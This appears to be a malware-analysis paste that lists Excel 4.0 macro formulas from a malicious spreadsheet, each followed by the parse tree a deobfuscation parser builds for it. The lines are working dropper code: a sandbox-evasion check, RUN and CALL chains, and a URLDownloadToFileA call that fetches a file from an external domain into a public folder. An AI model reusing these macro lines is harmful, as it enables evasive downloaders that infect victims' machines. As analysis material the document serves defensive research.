dissectmalware

Macro - Sample Parse Tree

Apr 9th, 2020
  1. =FORMULA($ET$1796&$BE$1701&$DB$1527&$BU$714&$CT$1605)
  2. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'FORMULA'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$ET$1796')])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BE$1701')])])])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$DB$1527')])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BU$714')])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$CT$1605')])])])])])])])])])])])
  3.  
  4. =RUN($DC$240)
  5. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'RUN'), Tree(arglist, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$DC$240')])])])])])])])
  6.  
  7. =CHAR($IE$1109-308)
  8. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'CHAR'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$IE$1109')])])]), Tree(binary_operator, [Token(ARITHMETICOP, '-')]), Tree(argument, [Token(INT, '308')])])])])])])])
  9.  
  10. =CALL($C$649,$FN$698,$AM$821,0,$BB$54,$BK$36,0,0)
  11. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'CALL'), Tree(arglist, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$C$649')])])]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$FN$698')])])]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$AM$821')])])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BB$54')])])]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BK$36')])])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Token(INT, '0')])])])])])
  12.  
  13. =HALT()
  14. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'HALT'), Tree(arglist, [])])])])
  15.  
  16. =WAIT(NOW()+"00:00:03")
  17. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'WAIT'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(function_call, [Token(NAME, 'NOW'), Tree(arglist, [])])]), Tree(binary_operator, [Token(ARITHMETICOP, '+')]), Tree(argument, [Tree(string, [Token(__ANON_2, '00:00:03')])])])])])])])])
  18.  
  19. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  20. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'IF'), Tree(arglist, [Tree(argument, [Tree(method_call, [Token(NAME, 'GET'), Token(NAME, 'WORKSPACE'), Tree(arglist, [Tree(argument, [Token(INT, '19')])])])]), Tree(argument, [Tree(function_call, [Token(NAME, 'CLOSE'), Tree(arglist, [Tree(argument, [Token(BOOLEAN, 'TRUE')])])])])])])])])
  21.  
  22. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  23. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'IF'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(relative_cell, [Token(__ANON_1, '[-1]')])])]), Tree(binary_operator, [Token(LOGICALOP, '<')]), Tree(argument, [Token(INT, '0')])])]), Tree(argument, [Tree(function_call, [Token(NAME, 'CALL'), Tree(arglist, [Tree(argument, [Tree(string, [Token(__ANON_2, 'urlmon')])]), Tree(argument, [Tree(string, [Token(__ANON_2, 'URLDownloadToFileA')])]), Tree(argument, [Tree(string, [Token(__ANON_2, 'JJCCJJ')])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Tree(string, [Token(__ANON_2, 'https://ddfspwxrb.club/fb2g424g')])]), Tree(argument, [Tree(string, [Token(__ANON_2, 'c:\\Users\\Public\\bwep5ef.html')])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Token(INT, '0')])])])])])])])])